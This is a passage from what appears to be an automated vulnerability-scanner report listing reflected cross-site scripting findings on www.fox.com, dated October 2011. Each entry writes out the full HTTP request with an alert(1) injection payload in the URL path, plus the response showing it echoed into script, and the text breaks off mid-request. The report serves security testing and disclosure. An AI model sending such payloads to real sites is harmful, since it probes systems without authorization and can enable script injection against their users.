Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf64e97"-alert(1)-"09df118e9c9/foxUrlSigningPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.104
Content-Type: text/html; charset=utf-8
Content-Length: 21756
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:18:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf64e97"-alert(1)-"09df118e9c9"
s_analytics.prop15="sub section:foxurlsigningplugin" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_ana
...[SNIP]...

1.171. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/ggtp370.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5f9a"-alert(1)-"4e380a2135f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uia5f9a"-alert(1)-"4e380a2135f/fox_player/swf/ggtp370.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 21848
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uia5f9a"-alert(1)-"4e380a2135f:fox_playerggtp370"
s_analytics.hier1="fox:shows:_uia5f9a"-alert(1)-"4e380a2135f:fox_playerggtp370" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uia5f9a"-alert(1)-"4e380a213
...[SNIP]...

1.172. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/ggtp370.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1b9b"-alert(1)-"e54b1cd4320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playere1b9b"-alert(1)-"e54b1cd4320/swf/ggtp370.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 21820
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playere1b9b"-alert(1)-"e54b1cd4320ggtp370"
s_analytics.hier1="fox:shows:_ui:fox_playere1b9b"-alert(1)-"e54b1cd4320ggtp370" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playere1b9b"-alert(1)-"e54b1cd43
...[SNIP]...

1.173. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/ggtp370.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca774"-alert(1)-"25f577dff3d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swfca774"-alert(1)-"25f577dff3d/ggtp370.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.101
Content-Type: text/html; charset=utf-8
Content-Length: 21708
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfca774"-alert(1)-"25f577dff3d"
s_analytics.prop15="sub section:ggtp370" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQu
...[SNIP]...

1.174. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/omnitureMedia.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4487e"-alert(1)-"727a136ab82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui4487e"-alert(1)-"727a136ab82/fox_player/swf/omnitureMedia.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.112
Content-Type: text/html; charset=utf-8
Content-Length: 21872
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui4487e"-alert(1)-"727a136ab82:fox_playeromnituremedia"
s_analytics.hier1="fox:shows:_ui4487e"-alert(1)-"727a136ab82:fox_playeromnituremedia" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui4487e"-alert(1
...[SNIP]...

1.175. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/omnitureMedia.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b5e9"-alert(1)-"8beae5ac93f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player3b5e9"-alert(1)-"8beae5ac93f/swf/omnitureMedia.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.110
Content-Type: text/html; charset=utf-8
Content-Length: 21844
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player3b5e9"-alert(1)-"8beae5ac93fomnituremedia"
s_analytics.hier1="fox:shows:_ui:fox_player3b5e9"-alert(1)-"8beae5ac93fomnituremedia" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player3b5e9"-alert(1
...[SNIP]...

1.176. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/omnitureMedia.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad80e"-alert(1)-"458de5bad2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swfad80e"-alert(1)-"458de5bad2/omnitureMedia.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.109
Content-Type: text/html; charset=utf-8
Content-Length: 21731
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:41 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfad80e"-alert(1)-"458de5bad2"
s_analytics.prop15="sub section:omnituremedia" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics
...[SNIP]...

1.177. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/videoXml.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bde97"-alert(1)-"e5dbf06f5fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uibde97"-alert(1)-"e5dbf06f5fc/fox_player/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.119
Content-Type: text/html; charset=utf-8
Content-Length: 21861
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uibde97"-alert(1)-"e5dbf06f5fc:fox_playervideoxml"
s_analytics.hier1="fox:shows:_uibde97"-alert(1)-"e5dbf06f5fc:fox_playervideoxml" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uibde97"-alert(1)-"e5dbf06
...[SNIP]...

1.178. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/videoXml.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36edf"-alert(1)-"96f3cfa2d32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player36edf"-alert(1)-"96f3cfa2d32/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.110
Content-Type: text/html; charset=utf-8
Content-Length: 21833
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player36edf"-alert(1)-"96f3cfa2d32videoxml"
s_analytics.hier1="fox:shows:_ui:fox_player36edf"-alert(1)-"96f3cfa2d32videoxml" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player36edf"-alert(1)-"96f3cfa
...[SNIP]...

1.179. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js/combinedjs.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 575b6"-alert(1)-"e3dfa6a0a2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui575b6"-alert(1)-"e3dfa6a0a2e/js/combinedjs.php?page=tracking HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%255D%7C1475608962059%3B%20s_vnum%3D1320123600936%2526vn%253D3%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317758115849%3B%20s_dayslastvisit%3D1317756315852%7C1412364315852%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758115852%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.101
Content-Type: text/html; charset=utf-8
Content-Length: 21831
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:08:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui575b6"-alert(1)-"e3dfa6a0a2e:jscombinedjs"
s_analytics.hier1="fox:shows:_ui575b6"-alert(1)-"e3dfa6a0a2e:jscombinedjs" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui575b6"-alert(1)-"e3dfa6a0a2e:jscombi
...[SNIP]...

1.180. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js/combinedjs.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8760"-alert(1)-"1dac83bc5b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/jse8760"-alert(1)-"1dac83bc5b5/combinedjs.php?page=tracking HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
